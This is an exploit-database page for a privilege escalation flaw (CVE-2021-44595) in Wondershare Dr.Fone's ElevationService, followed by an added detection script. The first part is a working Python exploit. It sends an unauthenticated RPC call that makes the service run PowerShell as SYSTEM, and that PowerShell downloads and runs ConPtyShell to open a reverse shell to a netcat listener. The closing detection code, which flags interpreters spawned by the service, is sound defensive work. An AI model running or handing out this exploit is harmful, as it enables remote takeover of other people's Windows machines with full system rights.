Wondershare Dr.Fone 12.0.7 – Privilege Escalation (ElevationService)

  • Author: Netanel Cohen
    Date: 2022-05-11
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/50912/
  • # Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)
    # Date: 4/27/2022
    # Exploit Author: Netanel Cohen & Tomer Peled
    # Vendor Homepage: https://drfone.wondershare.net/
    # Software Link: https://download.wondershare.net/drfone_full4008.exe
    # Version: up to 12.0.7
    # Tested on: Windows 10
    # CVE : 2021-44595
    # References: https://github.com/netanelc305/WonderShell
    
    # Wondershare Dr.Fone latest version as of 2021-12-06 is vulnerable to Incorrect Access Control.
    # A normal user can send manually crafted packets to ElevationService.exe and
    # execute arbitrary code with SYSTEM privileges, without any validation.
    
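    #!/bin/python3
    import msgpackrpc
    
    # Address and port that receive the reverse shell
    LADDR = "192.168.14.129"
    LPORT = 1338
    
    # Host running ElevationService.exe and its msgpack-rpc port
    RADDR = "192.168.14.137"
    RPORT = 12345
    
    # PowerShell command passed to the service
    param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}"
    client = msgpackrpc.Client(msgpackrpc.Address(RADDR, RPORT))
    # The service runs the 'system_s' request as SYSTEM without validating the caller
    result = client.call('system_s', 'powershell', param)
    
    # Listener: stty raw -echo; (stty size; cat) | nc -lvnp 1338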
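
Detection side of the issue described above, as an added example that is not part of the original advisory or the authors' repository: it triages process-creation records and flags an interpreter whose parent is ElevationService.exe. It assumes the service launches the requested program as a child process and that events carry fields named as in Sysmon process-creation events; the interpreter list, download tokens, install path placeholder and sample events are constructed for illustration.

```python
import ntpath

# Service binary named on the page; it should not normally parent an interpreter.
SERVICE_IMAGE = "elevationservice.exe"
# Assumed list of interpreters worth alerting on; tune for your environment.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed tokens suggesting the command line fetches remote content.
DOWNLOAD_TOKENS = ("iwr", "invoke-webrequest", "downloadstring", "http://", "https://")


def triage(event):
    """Return None for unrelated events, else a finding dict with a severity."""
    parent = ntpath.basename(event.get("ParentImage", "")).lower()
    child = ntpath.basename(event.get("Image", "")).lower()
    if parent != SERVICE_IMAGE or child not in INTERPRETERS:
        return None
    cmd = event.get("CommandLine", "").lower()
    fetches = any(tok in cmd for tok in DOWNLOAD_TOKENS)
    return {
        "severity": "critical" if fetches else "high",
        "host": event.get("Computer", "?"),
        "child": child,
        "reason": "interpreter spawned by ElevationService.exe"
                  + (" with remote fetch in command line" if fetches else ""),
    }


def scan(events):
    """Triage a batch of events and keep only the findings."""
    return [f for f in map(triage, events) if f is not None]


# Constructed sample events (hosts and paths are placeholders, not taken from the page).
SAMPLE_EVENTS = [
    {"Computer": "WS-01", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\<install-dir>\\ElevationService.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell IEX(IWR https://example.invalid/a.ps1 -UseBasicParsing)"},
    {"Computer": "WS-02", "User": "NT AUTHORITY\\SYSTEM",
     "ParentImage": "C:\\<install-dir>\\ElevationService.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd.exe /c whoami"},
    {"Computer": "WS-03", "User": "CORP\\alice",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell Get-ChildItem"},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

On hosts where Dr.Fone cannot be removed or updated, the same parent/child condition can be expressed as a rule in whatever EDR or SIEM already ingests process-creation telemetry.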